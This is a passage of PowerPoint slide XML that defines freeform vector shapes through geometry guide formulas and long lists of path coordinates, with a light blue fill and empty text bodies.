                  <a:gd name="T90" fmla="*/ 34 w 55"/>
                  <a:gd name="T91" fmla="*/ 60 h 69"/>
                  <a:gd name="T92" fmla="*/ 32 w 55"/>
                  <a:gd name="T93" fmla="*/ 62 h 69"/>
                  <a:gd name="T94" fmla="*/ 31 w 55"/>
                  <a:gd name="T95" fmla="*/ 64 h 69"/>
                  <a:gd name="T96" fmla="*/ 30 w 55"/>
                  <a:gd name="T97" fmla="*/ 66 h 69"/>
                  <a:gd name="T98" fmla="*/ 28 w 55"/>
                  <a:gd name="T99" fmla="*/ 69 h 69"/>
                  <a:gd name="T100" fmla="*/ 26 w 55"/>
                  <a:gd name="T101" fmla="*/ 69 h 69"/>
                  <a:gd name="T102" fmla="*/ 25 w 55"/>
                  <a:gd name="T103" fmla="*/ 67 h 69"/>
                  <a:gd name="T104" fmla="*/ 24 w 55"/>
                  <a:gd name="T105" fmla="*/ 62 h 69"/>
                  <a:gd name="T106" fmla="*/ 26 w 55"/>
                  <a:gd name="T107" fmla="*/ 42 h 69"/>
                  <a:gd name="T108" fmla="*/ 12 w 55"/>
                  <a:gd name="T109" fmla="*/ 19 h 69"/>
                  <a:gd name="T110" fmla="*/ 0 w 55"/>
                  <a:gd name="T111" fmla="*/ 4 h 69"/>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55"/>
                  <a:gd name="T169" fmla="*/ 0 h 69"/>
                  <a:gd name="T170" fmla="*/ 55 w 55"/>
                  <a:gd name="T171" fmla="*/ 69 h 69"/>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55" h="69">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35877" name="Freeform 411"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3161" y="2064"/>
                <a:ext cx="55" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 55"/>
                  <a:gd name="T1" fmla="*/ 3 h 69"/>
                  <a:gd name="T2" fmla="*/ 3 w 55"/>
                  <a:gd name="T3" fmla="*/ 2 h 69"/>
                  <a:gd name="T4" fmla="*/ 7 w 55"/>
                  <a:gd name="T5" fmla="*/ 2 h 69"/>
                  <a:gd name="T6" fmla="*/ 11 w 55"/>
                  <a:gd name="T7" fmla="*/ 1 h 69"/>
                  <a:gd name="T8" fmla="*/ 14 w 55"/>
                  <a:gd name="T9" fmla="*/ 0 h 69"/>
                  <a:gd name="T10" fmla="*/ 16 w 55"/>
                  <a:gd name="T11" fmla="*/ 1 h 69"/>
                  <a:gd name="T12" fmla="*/ 18 w 55"/>
                  <a:gd name="T13" fmla="*/ 0 h 69"/>
                  <a:gd name="T14" fmla="*/ 21 w 55"/>
                  <a:gd name="T15" fmla="*/ 3 h 69"/>
                  <a:gd name="T16" fmla="*/ 24 w 55"/>
                  <a:gd name="T17" fmla="*/ 5 h 69"/>
                  <a:gd name="T18" fmla="*/ 26 w 55"/>
                  <a:gd name="T19" fmla="*/ 6 h 69"/>
                  <a:gd name="T20" fmla="*/ 28 w 55"/>
                  <a:gd name="T21" fmla="*/ 6 h 69"/>
                  <a:gd name="T22" fmla="*/ 28 w 55"/>
                  <a:gd name="T23" fmla="*/ 7 h 69"/>
                  <a:gd name="T24" fmla="*/ 29 w 55"/>
                  <a:gd name="T25" fmla="*/ 9 h 69"/>
                  <a:gd name="T26" fmla="*/ 32 w 55"/>
                  <a:gd name="T27" fmla="*/ 7 h 69"/>
                  <a:gd name="T28" fmla="*/ 36 w 55"/>
                  <a:gd name="T29" fmla="*/ 12 h 69"/>
                  <a:gd name="T30" fmla="*/ 39 w 55"/>
                  <a:gd name="T31" fmla="*/ 11 h 69"/>
                  <a:gd name="T32" fmla="*/ 41 w 55"/>
                  <a:gd name="T33" fmla="*/ 13 h 69"/>
                  <a:gd name="T34" fmla="*/ 41 w 55"/>
                  <a:gd name="T35" fmla="*/ 16 h 69"/>
                  <a:gd name="T36" fmla="*/ 41 w 55"/>
                  <a:gd name="T37" fmla="*/ 20 h 69"/>
                  <a:gd name="T38" fmla="*/ 41 w 55"/>
                  <a:gd name="T39" fmla="*/ 24 h 69"/>
                  <a:gd name="T40" fmla="*/ 44 w 55"/>
                  <a:gd name="T41" fmla="*/ 27 h 69"/>
                  <a:gd name="T42" fmla="*/ 46 w 55"/>
                  <a:gd name="T43" fmla="*/ 26 h 69"/>
                  <a:gd name="T44" fmla="*/ 47 w 55"/>
                  <a:gd name="T45" fmla="*/ 28 h 69"/>
                  <a:gd name="T46" fmla="*/ 46 w 55"/>
                  <a:gd name="T47" fmla="*/ 32 h 69"/>
                  <a:gd name="T48" fmla="*/ 47 w 55"/>
                  <a:gd name="T49" fmla="*/ 33 h 69"/>
                  <a:gd name="T50" fmla="*/ 48 w 55"/>
                  <a:gd name="T51" fmla="*/ 36 h 69"/>
                  <a:gd name="T52" fmla="*/ 51 w 55"/>
                  <a:gd name="T53" fmla="*/ 38 h 69"/>
                  <a:gd name="T54" fmla="*/ 53 w 55"/>
                  <a:gd name="T55" fmla="*/ 41 h 69"/>
                  <a:gd name="T56" fmla="*/ 53 w 55"/>
                  <a:gd name="T57" fmla="*/ 44 h 69"/>
                  <a:gd name="T58" fmla="*/ 53 w 55"/>
                  <a:gd name="T59" fmla="*/ 46 h 69"/>
                  <a:gd name="T60" fmla="*/ 55 w 55"/>
                  <a:gd name="T61" fmla="*/ 48 h 69"/>
                  <a:gd name="T62" fmla="*/ 53 w 55"/>
                  <a:gd name="T63" fmla="*/ 49 h 69"/>
                  <a:gd name="T64" fmla="*/ 51 w 55"/>
                  <a:gd name="T65" fmla="*/ 49 h 69"/>
                  <a:gd name="T66" fmla="*/ 49 w 55"/>
                  <a:gd name="T67" fmla="*/ 47 h 69"/>
                  <a:gd name="T68" fmla="*/ 48 w 55"/>
                  <a:gd name="T69" fmla="*/ 49 h 69"/>
                  <a:gd name="T70" fmla="*/ 46 w 55"/>
                  <a:gd name="T71" fmla="*/ 48 h 69"/>
                  <a:gd name="T72" fmla="*/ 44 w 55"/>
                  <a:gd name="T73" fmla="*/ 47 h 69"/>
                  <a:gd name="T74" fmla="*/ 43 w 55"/>
                  <a:gd name="T75" fmla="*/ 47 h 69"/>
                  <a:gd name="T76" fmla="*/ 42 w 55"/>
                  <a:gd name="T77" fmla="*/ 48 h 69"/>
                  <a:gd name="T78" fmla="*/ 41 w 55"/>
                  <a:gd name="T79" fmla="*/ 46 h 69"/>
                  <a:gd name="T80" fmla="*/ 39 w 55"/>
                  <a:gd name="T81" fmla="*/ 46 h 69"/>
                  <a:gd name="T82" fmla="*/ 37 w 55"/>
                  <a:gd name="T83" fmla="*/ 49 h 69"/>
                  <a:gd name="T84" fmla="*/ 38 w 55"/>
                  <a:gd name="T85" fmla="*/ 52 h 69"/>
                  <a:gd name="T86" fmla="*/ 37 w 55"/>
                  <a:gd name="T87" fmla="*/ 55 h 69"/>
                  <a:gd name="T88" fmla="*/ 37 w 55"/>
                  <a:gd name="T89" fmla="*/ 58 h 69"/>
                  <a:gd name="T90" fmla="*/ 34 w 55"/>
                  <a:gd name="T91" fmla="*/ 60 h 69"/>
                  <a:gd name="T92" fmla="*/ 32 w 55"/>
                  <a:gd name="T93" fmla="*/ 62 h 69"/>
                  <a:gd name="T94" fmla="*/ 31 w 55"/>
                  <a:gd name="T95" fmla="*/ 64 h 69"/>
                  <a:gd name="T96" fmla="*/ 30 w 55"/>
                  <a:gd name="T97" fmla="*/ 66 h 69"/>
                  <a:gd name="T98" fmla="*/ 28 w 55"/>
                  <a:gd name="T99" fmla="*/ 69 h 69"/>
                  <a:gd name="T100" fmla="*/ 26 w 55"/>
                  <a:gd name="T101" fmla="*/ 69 h 69"/>
                  <a:gd name="T102" fmla="*/ 25 w 55"/>
                  <a:gd name="T103" fmla="*/ 67 h 69"/>
                  <a:gd name="T104" fmla="*/ 24 w 55"/>
                  <a:gd name="T105" fmla="*/ 62 h 69"/>
                  <a:gd name="T106" fmla="*/ 26 w 55"/>
                  <a:gd name="T107" fmla="*/ 42 h 69"/>
                  <a:gd name="T108" fmla="*/ 12 w 55"/>
                  <a:gd name="T109" fmla="*/ 19 h 69"/>
                  <a:gd name="T110" fmla="*/ 0 w 55"/>
                  <a:gd name="T111" fmla="*/ 4 h 69"/>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55"/>
                  <a:gd name="T169" fmla="*/ 0 h 69"/>
                  <a:gd name="T170" fmla="*/ 55 w 55"/>
                  <a:gd name="T171" fmla="*/ 69 h 69"/>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55" h="69">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="48"/>
